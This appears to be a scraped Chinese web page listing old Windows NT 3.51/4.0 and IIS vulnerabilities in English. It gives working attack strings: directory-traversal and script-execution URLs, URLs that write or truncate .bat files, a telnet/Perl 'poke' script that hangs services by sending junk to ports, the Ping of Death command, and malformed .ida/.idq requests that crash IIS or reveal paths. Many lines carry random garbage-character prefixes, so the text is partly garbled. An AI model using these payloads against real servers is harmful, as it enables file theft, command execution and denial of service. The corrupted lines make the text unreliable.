NT的漏洞及描述(英文）

受影響系統(tǒng):4.0,iis 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
0 S2 W* q. p, A+ N& g$ X
/ _, J$ p! t& z+ d' LA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
* Z/ D' f& w4 N* ^$ o1 ]
# p% u- p, w. ~2 Q" E4 p0 X2 e! \By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
( ^. ]3 A* i$ z" {. R, `
+ [( `4 }, q, _- G; I--------------------------------------------------------------------

6 n+ ?4 a2 d3 w1 |受影響系統(tǒng):4.0
7 D& \: i; r/ y& \# y" H4 R; vA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.

" N+ f. i; U9 O& S/ l6 }8 x2 eIf the file 'target.bat' exists, the file will be truncated.


2 g% o+ ]8 G: S5 Y+ r% ]$ WA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
! W, J% L6 `, t0 m9 w2 G* w+ |
. H# v( a$ l) t6 c----------------------------------------------------------------------

受影響系統(tǒng):3.51,4.0
' k0 _" b2 D7 B0 P% p# N7 XMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.

The following steps;
& }! B1 C2 L7 L8 v  j
& `7 n' [. w+ M! ^& x1 ?# ITelnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
1 @1 l1 p: f, H- N# x9 P* `7 EExit Telnet
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

5 c) U4 B1 f/ k2 f  L4 J" G0 J% x* RWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

8 W+ r" n2 v/ {( }- wThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
; D$ ]( q( W. P5 \
/ f% I' v4 g) V9 ]If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
7 Q/ q1 L- O0 n2 d1 l7 q4 ?4 E
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
: w  m! o+ U5 d. |. f3 |9 j# ^  A
9 ]* Z& d4 h4 Z) k/*begin poke code*/

use Socket;
$ z1 M! k( `9 c! W+ ]use FileHandle;
' c2 r: M5 U# @, drequire "chat2.pl";
3 K5 g6 X: b  ]5 V+ `) J/ w" Z
$systemname = $ARGV[0] && shift;

* d0 `( K( Z5 z$verbose = 1; # tell me what you're hitting
$knownports = 1; # don't hit known problem ports
for ($port = $0; $port<65535; $port++)
{

/ o! ^! ?8 W  G" z" s2 u7 `3 [& m
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
3 L' S1 p' P  Znext;
}
$fh = chat::open_port($systemname, $port);
' v3 M# y: X: x& z* B$ wchat::print ($fh,"This is about ten characters or more");
if ($verbose) {
print "Trying port: $port\n";
}
chat::close($fh);
+ b; ^) l: M1 n6 ]* m
}
$ i4 M4 y' o! T. v; v5 S

- I; x1 W) H/ Y* ^. K0 O4 r9 v0 x/*end poke code*/

Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
9 ?( y0 R: \. `
--------------------------------------------------------------------------------
, @7 D9 h) t% |0 R5 N9 h
4 @  q. B8 V7 X5 q- F; I受影響系統(tǒng):4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
+ d3 t$ S0 H) `* L7 m( `
This attack causes Dr. Watson to display an alert window and to log an error:

5 s' E: q0 g4 b2 c  J. L) A"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------

受影響系統(tǒng):3.51,4.0
! x4 {1 Q& v+ hLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
$ w1 s9 M! \7 u8 K* p- H$ J
* n; x! v' [: B3 L- qSTOP: 0X0000001E
5 P) p5 F# u7 RKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
7 _6 b5 L3 |. M' k5 _( ZIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
/ @+ @( W) n" v. v& {& h# g* e
NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.

--------------------------------------------------------------------------------
$ I" \8 B* P  V4 O2 K; X
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
6 }: w/ c0 w- b3 O- W! M! q/ b
--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server